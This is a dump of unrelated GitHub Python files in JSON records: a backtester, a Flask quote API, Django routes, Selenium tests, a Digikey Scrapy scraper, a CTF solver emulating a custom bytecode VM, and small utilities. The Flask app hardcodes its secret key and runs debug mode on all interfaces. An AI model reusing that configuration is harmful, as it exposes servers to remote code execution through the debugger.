portfolio_performance,get_hedged_returns,plot_portfolio_performance,format_year_performance,format_hedged_year_performance\nimport backtest.base_func as bf\nglobal_settings = {'effective_number': 200,\n 'target_number': 100,\n 'transform_mode': 3, #等权重\n # 'decay_num': 1, #TODO: used to smooth the signal\n # 'delay_num': 1,\n 'hedged_period': 60, #trick: 股指的rebalance时间窗口,也可以考虑使用风险敞口大小来作为relance与否的依据\n 'buy_commission': 2e-3,\n 'sell_commission': 2e-3\n }\n\n\nzz500, = bf.read_trade_data('zz500', data_path=os.path.join(DIR_BACKTEST,'backtest_data.h5'))\n\nbenchmark_returns_zz500 = zz500.pct_change()\nbenchmark_returns_zz500.name = 'benchmark'\n\ndef quick(signal,fig_title,start=None, end=None):\n global global_settings\n hedged_period = global_settings['hedged_period']\n\n if not start:\n start=trade_date[0]\n if not end:\n end=trade_date[-1]\n\n if isinstance(start,int):\n start=str(start)\n if isinstance(end,int):\n end=str(end)\n\n date_range = trade_date[start: end]\n benchmark = zz500[start: end]\n\n trade_returns, turnover_rates, positions_record, shares_record, transactions_record = backtest(\n date_range, signal,\n global_settings['buy_commission'], global_settings['sell_commission'],\n global_settings['effective_number'], global_settings['target_number'],\n global_settings['transform_mode'])\n\n turnover_rates[0] = np.nan\n positions_record = pd.concat(positions_record, keys=date_range,\n names=['tradeDate'])\n shares_record = pd.concat(shares_record, keys=date_range,\n names=['tradeDate'])\n transactions_record = pd.concat(transactions_record,\n axis=1).stack().swaplevel().sort_index(\n level=0)\n\n # for quantopia format\n positions_record = positions_record.unstack()\n positions_record['cash'] = np.nan\n\n shares_record = shares_record.unstack()\n\n txn_date = transactions_record.index.get_level_values(0)\n txn_symbol = transactions_record.index.get_level_values(1)\n txn_amount = transactions_record.values\n txn_price = np.zeros(len(txn_date))\n for i in range(len(txn_date)):\n if txn_amount[i] >= 0:\n txn_price[i] = buy_stocks_price.loc[txn_date[i], txn_symbol[i]]\n else:\n txn_price[i] = sell_stocks_price.loc[txn_date[i], txn_symbol[i]]\n transactions_record = pd.DataFrame(\n {'amount': txn_amount, 'price': txn_price, 'symbol': txn_symbol},\n index=txn_date)\n\n perf = portfolio_performance(trade_returns, benchmark)\n hedged_returns = get_hedged_returns(trade_returns, benchmark, hedged_period)\n hedged_perf = portfolio_performance(hedged_returns, benchmark)\n fig=plot_portfolio_performance(trade_returns, turnover_rates, hedged_returns,\n benchmark, perf, hedged_perf, fig_title, fig_handler=True)\n # format_year_performance(trade_returns, benchmark, turnover_rates,\n # fig_title)\n\n # format_hedged_year_performance(hedged_returns, benchmark,\n # fig_title + '_hedged')\n\n results = OrderedDict({\n 'trade_returns': trade_returns,\n 'turnover_rates': turnover_rates,\n 'positions_record': positions_record,\n 'shares_record': shares_record,\n 'transactions_record': transactions_record,\n 'hedged_returns': hedged_returns,\n 'hedged_perf':hedged_perf\n })\n return results,fig\n\n\n#TODO: 应该提供几种接口: 1. signal, 2. 股票,\n#TODO: 分别测算每年的对冲收益率,因为实际投资的时候不可能投资5年,所以cumprod实际会夸大效果\n#TODO: calculate yearly return\n\n'''\nfor Y in [str(i) for i in range(2010,2019)]:\n print(Y,(1+df[Y]).cumprod().values[-1])\n'''","repo_name":"dxcv/FT","sub_path":"backtest/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"22212964304","text":"# Coded By Gowtham on 03/06/2020\n# Coded Using Visual Studio Code\n\nfrom flask import Flask, request, jsonify\nfrom BrainyQuotes import getQuotes\nfrom flask_cors import CORS\n\napp = Flask(__name__)\napp.secret_key = \"I_am_Marvelous (^_^)\"\nCORS(app)\n\n\n@app.route('/')\ndef home():\n return 'Quote API is UP!

    A part of Alpha Projects'\n\n\n@app.route('/quotes')\ndef news():\n if request.method == 'GET':\n category = request.args.get('category')\n return jsonify(getQuotes(category))\n\n\nif __name__ == '__main__':\n app.debug = True\n app.run(host='0.0.0.0', port=5000, use_reloader=True)\n","repo_name":"Gowtham2003/BrainyQuotesAPI","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"60"} +{"seq_id":"22718261977","text":"from django.urls import path\n\nfrom common.views import (\n AboutUsListApiViews,\n ApplicationFormView,\n BannerApiView,\n BlogDetail,\n BlogList,\n BoardTextView,\n ContactFormView,\n ContactUsListApiView,\n SocialMediaList,\n TestimonialsListView,\n)\n\n\napp_name = \"common\"\nurlpatterns = [\n path(\"blogs/\", BlogList.as_view(), name=\"blog-list\"),\n path(\"blogs//\", BlogDetail.as_view(), name=\"blog-detail\"),\n path(\"banner/\", BannerApiView.as_view(), name=\"banner\"),\n path(\"application-form/\", ApplicationFormView.as_view(), name=\"application-form\"),\n path(\"about-us/\", AboutUsListApiViews.as_view(), name=\"about-us\"),\n path(\"contact/\", ContactUsListApiView.as_view(), name=\"contact-us\"),\n path(\"contact-form/\", ContactFormView.as_view(), name=\"contact-form\"),\n path(\"social-medias/\", SocialMediaList.as_view(), name=\"social-media-list\"),\n path(\"testimonials/\", TestimonialsListView.as_view(), name=\"testimonial-list\"),\n path(\"board/\", BoardTextView.as_view(), name=\"board\"),\n]\n","repo_name":"XudayberdiyevB/ecourseuz-api","sub_path":"common/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"31768861198","text":"\nfrom selenium import webdriver\nfrom django.test import LiveServerTestCase, tag\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium_tests.selenium_test_base import SeleniumTestBase\n\n@tag('ui')\nclass TestChart(SeleniumTestBase):\n \"\"\" UI Tests for solenoid chart \"\"\"\n\n def __init__(self, methods):\n super().__init__(methods)\n\n def test_chart_is_rendered(self):\n \"\"\" Test that after clicking the graph button that the chart gets rendered. \"\"\"\n \n self.driver.find_element_by_xpath(\"//*[@id='calc-container']/button\").click()\n self.driver.find_element_by_xpath(\"//*[@id='graph-select']/button\").click()\n self.assertTrue(self.driver.find_element_by_id(\"chart-element\").is_enabled())\n\n def test_x_input_resricts_y(self):\n \"\"\" Test that selecting a value for x to graph restricts the user from selecting that value for y. \"\"\"\n\n display_none_style = \"display: none;\"\n x_values = [\"Voltage\", \"Length\", \"r0\", \"ra\", \"x\", \"Force\"]\n for x_value in x_values:\n self.driver.find_element_by_id(\"option-x-\" + x_value).click()\n # The following line is commented out because is_displayed was returning true?\n # self.assertFalse(self.driver.find_element_by_id(\"option-y-\" + x_value).is_displayed())\n style_attribute = self.driver.find_element_by_id(\"option-y-\" + x_value).get_attribute(\"style\")\n self.assertEqual(display_none_style, style_attribute)","repo_name":"solenoid-pdx/solenoid","sub_path":"selenium_tests/test_chart.py","file_name":"test_chart.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"33660541917","text":"import sys\n\nINSTR = [\n 'WIPE',\n 'NEGATE',\n 'SWAP',\n 'DEAL',\n 'DEALW',\n 'DRAW',\n 'DRAWW',\n 'JUMP',\n 'LOADI',\n 'LOADB',\n 'STOREB',\n 'COPY4',\n 'XOR',\n 'ADD',\n 'BEQ',\n 'HALT'\n]\n\n\nbinary = open('bmpx/chall.bmpx', 'rb')\n\n# Load into memory\nmemory = []\nbyte = binary.read(1)\nwhile byte:\n memory.append(byte)\n byte = binary.read(1)\nmemptr = 0\nbinary.close()\n\ndef ReadBytes(n):\n global memptr, memory\n bs = b\"\".join([b for b in memory[memptr:memptr+n]])\n memptr += n\n return bs\n\ndef ReadBytesAt(n, at):\n global memory\n bs = b\"\".join([b for b in memory[at:at+n]])\n return bs\n\nmagic = ReadBytes(2)\nfsize = int.from_bytes(ReadBytes(4), byteorder=sys.byteorder)\nfexec = ReadBytes(4)\n\nif magic != b'BM' or fexec != b'EXEC':\n print('Magic bytes dont match with BMPX format.')\n exit()\n\ndataOffest = int.from_bytes(ReadBytes(4), byteorder=sys.byteorder)\nhsize = int.from_bytes(ReadBytes(4), byteorder=sys.byteorder)\nwidth = int.from_bytes(ReadBytes(4), byteorder=sys.byteorder)\nheight = int.from_bytes(ReadBytes(4), byteorder=sys.byteorder)\nhplanes = int.from_bytes(ReadBytes(2), byteorder=sys.byteorder)\nbpx = int.from_bytes(ReadBytes(2), byteorder=sys.byteorder)\nhcomp = int.from_bytes(ReadBytes(4), byteorder=sys.byteorder)\nisize = int.from_bytes(ReadBytes(4), byteorder=sys.byteorder)\nXpixelsPerM = int.from_bytes(ReadBytes(4), byteorder=sys.byteorder)\nYpixelsPerM = int.from_bytes(ReadBytes(4), byteorder=sys.byteorder)\ncolorsUsed = int.from_bytes(ReadBytes(4), byteorder=sys.byteorder)\ncolorsImportant = int.from_bytes(ReadBytes(4), byteorder=sys.byteorder)\n\nred = int.from_bytes(ReadBytes(1), byteorder=sys.byteorder)\ngreen = int.from_bytes(ReadBytes(1), byteorder=sys.byteorder)\nblue = int.from_bytes(ReadBytes(1), byteorder=sys.byteorder)\nclrrsrvd = int.from_bytes(ReadBytes(1), byteorder=sys.byteorder)\nred = int.from_bytes(ReadBytes(1), byteorder=sys.byteorder)\ngreen = int.from_bytes(ReadBytes(1), byteorder=sys.byteorder)\nblue = int.from_bytes(ReadBytes(1), byteorder=sys.byteorder)\nclrrsrvd = int.from_bytes(ReadBytes(1), byteorder=sys.byteorder)\n\nRIP = 29 # Instruction Register\nPS = 30 # Prime Sequence Register\nPR = 31 # Position Register\nregisters = [0] * 32\n\n# Initialize Registers\nregisters[RIP] = dataOffest\nregisters[PR] = dataOffest\nregisters[PS] = 0x05030201\n\nprint(f'Image Size: {width}x{height}')\nprint(f'Data Offset: {hex(dataOffest)}')\nprint('')\nprint(f'{hsize} {width} {height} {hplanes} {bpx} {hcomp} {isize} {XpixelsPerM} {YpixelsPerM} {colorsUsed} {colorsImportant} {red} {green} {blue} {clrrsrvd}')\n\nmemory[0x2E] = (2).to_bytes(1, 'little')\nmemory[0x1C] = (1).to_bytes(1, 'little')\nmemory[0x26] = (254).to_bytes(1, 'little')\nmemory[0x2a] = (254).to_bytes(1, 'little')\n\ndef PrintRegisters():\n global memptr, registers, memory\n print(f'PS: {registers[PS]} RIP: {registers[RIP]} PR: {registers[PR]}')\n prtstr = ''\n for i in range(29):\n prtstr += f'R{i}: {registers[i]} '\n print(prtstr)\n\ndef PrintInstruction(binn):\n opcode = int(binn[0:4], 2)\n reg1 = int(binn[4:9], 2)\n\n sInstr = INSTR[opcode]\n \n\n if sInstr == 'DEAL' or sInstr == 'DEALW' or sInstr == 'WIPE' or sInstr == 'NEGATE' or sInstr == 'SWAP' or sInstr == 'DRAW' or sInstr == 'DRAWW' or sInstr == 'JUMP':\n reg = f'R{reg1}'\n if reg1 == RIP:\n reg = f'RIP'\n elif reg1 == PR:\n reg = f'PR'\n elif reg1 == PS:\n reg = f'PS'\n print(f'{INSTR[opcode]} {reg}\\t\\t\\t({binn})')\n elif sInstr == 'COPY4':\n reg2 = int(binn[9:14], 2)\n regA = f'R{reg1}'\n if reg1 == RIP:\n regA = f'RIP'\n elif reg1 == PR:\n regA = f'PR'\n elif reg1 == PS:\n regA = f'PS'\n\n regB = f'R{reg2}'\n if reg2 == RIP:\n regB = f'RIP'\n elif reg2 == PR:\n regB = f'PR'\n elif reg2 == PS:\n regB = f'PS'\n\n b1 = int(binn[14])\n b2 = int(binn[15])\n b3 = int(binn[16])\n b4 = int(binn[17])\n\n print(f'{INSTR[opcode]} {regA} {regB} {b1}{b2}{b3}{b4}\\t\\t({binn})')\n elif sInstr == 'LOADI':\n imm = int(binn[9:25], 2)\n regA = f'R{reg1}'\n if reg1 == RIP:\n regA = f'RIP'\n elif reg1 == PR:\n regA = f'PR'\n elif reg1 == PS:\n regA = f'PS'\n\n print(f'{INSTR[opcode]} {regA} {imm}\\t\\t\\t({binn})')\n elif sInstr == 'XOR' or sInstr == 'ADD':\n reg2 = int(binn[9:14], 2)\n reg3 = int(binn[14:19], 2)\n\n regA = f'R{reg1}'\n if reg1 == RIP:\n regA = f'RIP'\n elif reg1 == PR:\n regA = f'PR'\n elif reg1 == PS:\n regA = f'PS'\n\n regB = f'R{reg2}'\n if reg2 == RIP:\n regB = f'RIP'\n elif reg2 == PR:\n regB = f'PR'\n elif reg2 == PS:\n regB = f'PS'\n\n regC = f'R{reg3}'\n if reg3 == RIP:\n regC = f'RIP'\n elif reg3 == PR:\n regC = f'PR'\n elif reg3 == PS:\n regC = f'PS'\n\n print(f'{INSTR[opcode]} {regA} {regB} {regC}\\t\\t\\t({binn})')\n elif sInstr == 'HALT':\n print(f'{INSTR[opcode]}\\t\\t\\t\\t({binn}')\n elif sInstr == 'LOADB' or sInstr == 'STOREB':\n reg2 = int(binn[9:14], 2)\n imm = int(binn[9:25], 2)\n\n regA = f'R{reg1}'\n if reg1 == RIP:\n regA = f'RIP'\n elif reg1 == PR:\n regA = f'PR'\n elif reg1 == PS:\n regA = f'PS'\n\n regB = f'R{reg2}'\n if reg2 == RIP:\n regB = f'RIP'\n elif reg2 == PR:\n regB = f'PR'\n elif reg2 == PS:\n regB = f'PS'\n\n print(f'{INSTR[opcode]} {regA} {regB} {imm}\\t\\t({binn})')\n else:\n print(sInstr + ' ' + binn)\n\ndef Disassemble():\n global memptr, registers, memory\n print('--- Disassembly ---')\n memptr = dataOffest\n isRunning = True\n counter = dataOffest\n while isRunning:\n binn = bin(int.from_bytes(ReadBytes(4), byteorder='big'))[2:].zfill(32)\n \n PrintInstruction(binn)\n counter += 4\n if counter > len(memory):\n isRunning = False\n\n PrintRegisters()\n\ndef Step():\n global memptr, registers, memory\n memptr = registers[RIP]\n binn = bin(int.from_bytes(ReadBytes(4), byteorder='big'))[2:].zfill(32)\n opcode = int(binn[0:4], 2)\n reg1 = int(binn[4:9], 2)\n\n sInstr = INSTR[opcode]\n\n if sInstr != 'JUMP':\n registers[RIP] = registers[RIP] + 4\n\n PrintInstruction(binn)\n if sInstr == 'COPY4':\n reg1 = int(binn[4:9], 2)\n reg2 = int(binn[9:14], 2)\n mask = int(binn[14:18], 2)\n \n registers[reg1] = (registers[reg1] & (~(1 << 0))) | (registers[reg2] & 1)\n registers[reg1] = (registers[reg1] & (~(1 << 1))) | (registers[reg2] & 2)\n registers[reg1] = (registers[reg1] & (~(1 << 2))) | (registers[reg2] & 4)\n registers[reg1] = (registers[reg1] & (~(1 << 3))) | (registers[reg2] & 10)\n\n\n elif sInstr == 'LOADI':\n reg1 = int(binn[4:9], 2)\n imm = int(binn[9:25], 2)\n registers[reg1] = (registers[reg1] & (0xFFFF0000)) | imm\n elif sInstr == 'ADD':\n reg1 = int(binn[4:9], 2)\n reg2 = int(binn[9:14], 2)\n reg3 = int(binn[14:19], 2)\n\n registers[reg3] = registers[reg1] + registers[reg2]\n elif sInstr == 'NEGATE':\n registers[reg1] = -1 * registers[reg1]\n elif sInstr == 'DRAWW':\n reg1 = int(binn[4:9], 2)\n\n registers[reg1] = int.from_bytes(ReadBytesAt(4, registers[PR]), byteorder='big')\n del(memory[registers[PR]])\n del(memory[registers[PR]])\n del(memory[registers[PR]])\n del(memory[registers[PR]])\n\n # Unchanged\n registers[PR] = registers[PR]\n registers[RIP] = registers[RIP]\n elif sInstr == 'DRAW':\n reg1 = int(binn[4:9], 2)\n\n registers[reg1] = ((registers[reg1] << 8) & 0xFFFFFFFF) | int.from_bytes(ReadBytesAt(1, registers[PR]), byteorder='big')\n del(memory[registers[PR]])\n\n\n # Unchanged\n registers[PR] = registers[PR]\n registers[RIP] = registers[RIP]\n elif sInstr == 'DEAL':\n reg1 = int(binn[4:9], 2)\n memory.insert(registers[PR], 0)\n val = registers[reg1] >> 24\n memory[registers[PR]] = val.to_bytes(1, 'big')\n\n if registers[RIP] > registers[PR]:\n registers[RIP] = registers[RIP] + 1\n registers[PR] = registers[PR] + 1\n registers[reg1] = (registers[reg1] << 8) & 0xFFFFFFFF\n elif sInstr == 'DEALW':\n reg1 = int(binn[4:9], 2)\n\n if registers[reg1] < 0:\n registers[reg1] = registers[reg1] & 0xFFFFFFFF\n\n memory.insert(registers[PR], 0)\n memory.insert(registers[PR], 0)\n memory.insert(registers[PR], 0)\n memory.insert(registers[PR], 0)\n\n\n val = (registers[reg1] >> 0) & 0xFF\n memory[registers[PR] + 3] = val.to_bytes(1, 'big')\n val = (registers[reg1] >> 8) & 0xFF\n memory[registers[PR] + 2] = val.to_bytes(1, 'big')\n val = (registers[reg1] >> 16) & 0xFF\n memory[registers[PR] + 1] = val.to_bytes(1, 'big')\n val = (registers[reg1] >> 24) & 0xFF\n memory[registers[PR] + 0] = val.to_bytes(1, 'big')\n\n if registers[RIP] > registers[PR]:\n registers[RIP] = registers[RIP] + 4\n registers[PR] = registers[PR] + 4\n registers[reg1] = 0\n elif sInstr == 'LOADB':\n reg1 = int(binn[4:9], 2)\n reg2 = int(binn[9:14], 2)\n imm = int(binn[14:30], 2)\n\n registers[reg1] = (registers[reg1] & 0xFFFFFF00) | int.from_bytes(ReadBytesAt(1, registers[reg2] + imm), byteorder='big')\n\n elif sInstr == 'JUMP':\n reg1 = int(binn[4:9], 2)\n registers[RIP] = registers[reg1]\n elif sInstr == 'WIPE':\n reg1 = int(binn[4:9], 2)\n val = 0\n registers[reg1] = val.to_bytes(1, 'big')\n elif sInstr == 'XOR':\n reg1 = int(binn[4:9], 2)\n reg2 = int(binn[9:14], 2)\n reg3 = int(binn[14:19], 2)\n\n registers[reg3] = registers[reg1] ^ registers[reg2]\n elif sInstr == 'SWAP':\n reg1 = int(binn[4:9], 2)\n\n most = registers[reg1] >> 24\n least = registers[reg1] & 0xFF\n\n registers[reg1] = (registers[reg1] & 0xFFFFFF00) | most\n registers[reg1] = (registers[reg1] & 0x00FFFFFF) | least\n\n elif sInstr == 'HALT':\n print('----------\\nProgram Exited\\n----------')\n return -1\n else:\n print('UNKNOWN INSTRUCTION')\n print(sInstr)\n\n\n PrintRegisters()\n return 0\n\n\nwhile True:\n print('D (Disassemble), S (Step), E (Exit)')\n inp = input()\n if inp == 'd':\n Disassemble()\n elif inp == 's':\n if Step() == -1:\n break\n elif inp == 'e':\n break\n\nwhile True:\n if Step() == -1:\n break\n\nout = open('bmpx/solve.bmpx', 'wb+')\nfor i in range(len(memory)):\n out.write(memory[i])","repo_name":"verd1c/ctf-writeups","sub_path":"UMD/2022/reverse/bmpv-love-letter/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":10951,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"60"} +{"seq_id":"10324552418","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Board',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=50)),\n ('participants', models.ManyToManyField(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'verbose_name': 'Board',\n 'verbose_name_plural': 'Boards',\n },\n ),\n migrations.CreateModel(\n name='List',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=40)),\n ('board', models.ForeignKey(to='test_app.Board')),\n ],\n options={\n 'verbose_name': 'List',\n 'verbose_name_plural': 'Lists',\n },\n ),\n migrations.CreateModel(\n name='Task',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=50)),\n ('body', models.TextField()),\n ],\n ),\n ]\n","repo_name":"D3f0/django_pg_notify","sub_path":"test_project/test_app/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"20041572171","text":"# -*- coding: utf-8 -*-\nfrom urlparse import urljoin\nimport datetime\nimport time\nimport logging\n\nimport scrapy\nfrom scrapy import Request\nfrom scrapy.loader import ItemLoader\nfrom wanda.items import DetailsItem, AvailabilityItem, PriceItem\nfrom scrapy.exceptions import CloseSpider\nfrom scrapy.shell import open_in_browser as o\nfrom webbrowser import open as ol\nimport ujson\nimport ipdb\n\n\ndef browser(response):\n ol(response.url)\n\n\nPRICE_QUOTE = -1\nFACTORY_LEAD_TIME_DEFAULT = \"unknown\"\nFACTORY_LEAD_UOM_DEFAULT = \"unknown\"\nPACKAGE_DEFAULT = \"none\"\nPACKAGING_DEFUALT = \"none\"\nVERSION_DEFAULT = 'none'\nTYPE_DEFAULT = 'none'\nPART_DETAIL_DEFAULT = 'none'\nPRICE_TYPE_DEFAULT = 'default'\nQUANTITY_DEFAULT = '-1'\nPRICE_DEFAULT = '-1'\nSTOCK_DEFAULT = '0'\n\n\nclass ArrowSpider(scrapy.Spider):\n name = \"digikey\"\n site_name = \"digikey\"\n start_url = \"http://www.digikey.com/product-search/en\"\n base_url = \"https://www.digikey.com/\"\n drop_count_items = 142057\n processed_items = 0\n\n def start_requests(self):\n yield Request(self.start_url)\n\n def parse(self, response):\n links = response.xpath(\"//li/a[contains(@href,'product-search')]/@href\").extract()\n for link in links:\n yield Request(urljoin(self.base_url,link)+\"?pageSize=500\",self.parse_1)\n def parse_1(self,response):\n next = response.xpath(\"//a[@class='Next']/@href\").extract()\n if next:\n yield Request(urljoin(self.base_url,next[0]),self.parse_1)\n products = response.xpath(\"//td[@class='digikey-partnumber']/a/@href\").extract()\n for link in products:\n yield Request(urljoin(self.base_url,link),self.parse_item)\n\n def parse_item(self,response):\n i = DetailsItem()\n i['site_name'] = self.site_name\n i['site_url'] = self.base_url\n loader = ItemLoader(i,response=response)\n loader.add_xpath(\"site_part_id\",\"//meta[@itemprop='productID']/@content\")\n loader.add_xpath(\"manuf_part_id\",\"//meta[@itemprop='name']/@content\")\n loader.add_xpath(\"manuf_name\",\"//span[@itemprop='name']/text()\")\n loader.add_xpath(\"description\",\"//td[@itemprop='description']/text()\")\n loader.add_xpath(\"datasheet_link\",\"//a[@class='lnkDatasheet']/@href\")\n loader.add_xpath(\"image_url\",\"//a[@class='lnkProductPhoto']/@href\")\n loader.add_value(\"page_url\",response.url)\n loader.add_xpath(\"part_detail\",\"//td[@class='attributes-table-main']\")\n loader.add_xpath(\"packaging\",\"//th[contains(text(),'Packaging')]/following-sibling::td/text()\")\n loader.add_xpath(\"package\",\"//th[contains(text(),'Standard Package')]/following-sibling::td/text()\")\n loader.add_value(\"package\",PACKAGE_DEFAULT)\n loader.add_value(\"packaging\",PACKAGING_DEFUALT)\n loader.add_xpath(\"type\",\"//th[text()='Accessory Type']/following-sibling::td/text()\")\n loader.add_value(\"version\",VERSION_DEFAULT)\n loader.add_value(\"date_created\",self.timestamp())\n i=loader.load_item()\n\n prices = response.xpath(\"//table[@id='pricing']/tr[td and not(contains(.//text(),'Call'))]\")\n for price in prices:\n td = price.xpath(\"td\")\n if len(td)==3:\n pi = PriceItem()\n pi['site_name'] = self.site_name\n pi['site_part_id'] = i['site_part_id']\n pi['date_created'] = self.timestamp()\n pi['price_type'] = i['packaging']\n pi['quantity'] = td[0].xpath(\"text()\").extract()[0]\n pi['price'] = td[1].xpath(\"text()\").extract()[0]\n i['price_data'].append(pi)\n\n avail = AvailabilityItem()\n avail['site_name'] = self.site_name\n avail['site_part_id'] = i['site_part_id']\n avail['date_created'] = self.timestamp()\n loader = ItemLoader(avail,response=response)\n loader.add_xpath(\"stock\",\"//td[@id='quantityavailable']\",re='\":\\s([\\d|\\,]*)')\n loader.add_value(\"factory_leadtime\",FACTORY_LEAD_TIME_DEFAULT)\n loader.add_value(\"factory_lead_uom\",FACTORY_LEAD_UOM_DEFAULT)\n avail = loader.load_item()\n i['inventory_data'].append(avail)\n self.processed_items+=1\n if self.processed_items==self.drop_count_items:\n raise CloseSpider(\"Sample collected\")\n yield i\n\n\n def timestamp(self):\n return datetime.datetime.fromtimestamp(time.time()).strftime('%m/%d/%Y %H:%M:%S')","repo_name":"tmslav/project","sub_path":"wanda/spiders/digikey.py","file_name":"digikey.py","file_ext":"py","file_size_in_byte":4424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42004262780","text":"import json\nfrom flask import Flask, render_template, request, redirect, url_for, jsonify, flash\n\ndef best_news():\n tweets = []\n with open('static/best_news.json', 'r') as json_file:\n data = json.load(json_file)\n return data\n # tweets.append(json.loads(line))\n # print(json.loads(line))\n # return json.dumps([tweets])\n # return json.load(([json.loads(line) for line in open('static/best_news.json', 'r')]))\n\nprint(best_news())\n","repo_name":"MotazBellah/news_feed","sub_path":"t.py","file_name":"t.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"7233562117","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom ddm_moi.Accumulator import AccumulatorModelMOI\nfrom ddm_moi.ddm_2d import get_stim_urg\n\naccum = AccumulatorModelMOI(\n tvec=np.arange(0, 2, 0.05),\n grid_vec=np.arange(-3, 0, 0.025),\n sensitivity=30*0.2,\n)\n\nhdgs = np.array(np.linspace(-12, 12, 9)) # to plot a smooth fit\nhdgs = np.sin(np.deg2rad(hdgs))\n\n\naccum.bound = np.array([2, 2])\naccum.urgency = get_stim_urg(tvec=accum.tvec, moment=1)\naccum.set_drifts(list(hdgs))\naccum.dist()\nprint(accum.p_corr)\n\nplt.plot(accum.drift_rates[0])\nplt.show()\n\nplt.plot(accum.tvec, accum.rt_dist.T)\nplt.show()\n\naccum.bound = np.array([2, 2])\naccum.urgency = None\naccum.set_drifts(list(hdgs))\naccum.dist()\nprint(accum.p_corr)\n\nplt.plot(accum.tvec, accum.rt_dist.T)\nplt.show()\n","repo_name":"sjjerjian/pyDots3DMP","sub_path":"archive/urgency_testing_script.py","file_name":"urgency_testing_script.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74617523069","text":"import argparse\nimport os\n\nfrom maas_common import metric\nfrom maas_common import print_output\nfrom maas_common import status_err\nfrom maas_common import status_ok\n\n\ndef physical_interface_errors():\n vnet_devices = os.listdir('/sys/devices/virtual/net')\n vnet_devices.append('bonding_masters')\n totals = dict()\n totals['rx_errors'] = 0\n totals['tx_errors'] = 0\n for d in os.listdir('/sys/class/net'):\n if d not in vnet_devices:\n for e in 'rx_errors', 'tx_errors':\n filepath = '/sys/class/net/%s/statistics/%s' % (d, e)\n with open(filepath, 'r') as f:\n totals[e] += int(f.read())\n f.close()\n return totals\n\n\ndef get_softnet_stats():\n softnet_stats = dict()\n softnet_stats['packet_drop'] = 0\n softnet_stats['time_squeeze'] = 0\n with open('/proc/net/softnet_stat', 'r') as f:\n for line in f:\n softnet_stats['packet_drop'] += int(line.split()[1], 16)\n softnet_stats['time_squeeze'] += int(line.split()[2], 16)\n return softnet_stats\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Network error statistics '\n 'check')\n parser.add_argument('--telegraf-output',\n action='store_true',\n default=False,\n help='Set the output format to telegraf')\n args = parser.parse_args()\n with print_output(print_telegraf=args.telegraf_output):\n try:\n totals = physical_interface_errors()\n softnet_stats = get_softnet_stats()\n except Exception as e:\n status_err(e, m_name='maas_network_stats')\n else:\n status_ok(m_name='maas_network_stats')\n for k, v in totals.items():\n metric('physical_interface_%s' % k, 'int64', v)\n for k, v in softnet_stats.items():\n metric('softnet_stats_%s' % k, 'int64', v)\n","repo_name":"rcbops/rpc-maas","sub_path":"playbooks/files/rax-maas/plugins/network_stats_check.py","file_name":"network_stats_check.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"60"} +{"seq_id":"6268559582","text":"#https://leetcode.com/problems/3sum/\n#Complexity O(n^2)\n\nclass Solution:\n def threeSum(self, nums: List[int]) -> List[List[int]]:\n \n length=len(nums)\n solutionSet=set()\n dictionary={}\n for i in range(length):\n dictionary[nums[i]]=i\n \n for i in range(length-1):\n val1=nums[i]\n for j in range(i+1,length):\n val2=nums[j]\n reqVal=0-val1-val2\n if reqVal in dictionary and i!=dictionary[reqVal] and j!=dictionary[reqVal]:\n solutionSet.add(tuple(sorted([val1,val2,reqVal])))\n \n return list(solutionSet)\n","repo_name":"aasthaagrawal/Algorithms_and_Data_Structures","sub_path":"leetcode/3sum_impl2.py","file_name":"3sum_impl2.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"22440656661","text":"import math\nimport tokenize\nfrom typing import Iterator, List\n\nfrom typing_extensions import final\n\nfrom wemake_python_styleguide.violations import best_practices\nfrom wemake_python_styleguide.visitors import base\n\n\n@final\nclass _Function(object):\n\n def __init__(self, file_tokens: List[tokenize.TokenInfo]) -> None:\n self._tokens = file_tokens\n\n def name_token(self) -> tokenize.TokenInfo:\n return self._tokens[1]\n\n def body(self) -> str:\n target_tokens = []\n for token in self._tokens:\n if self._is_target_line(token):\n continue\n target_tokens.append(token)\n return ''.join([target_token.string for target_token in target_tokens])\n\n def _is_target_line(self, token: tokenize.TokenInfo) -> bool:\n stripped_token_line = token.line.strip()\n is_comment = False\n if stripped_token_line:\n is_comment = '#' in 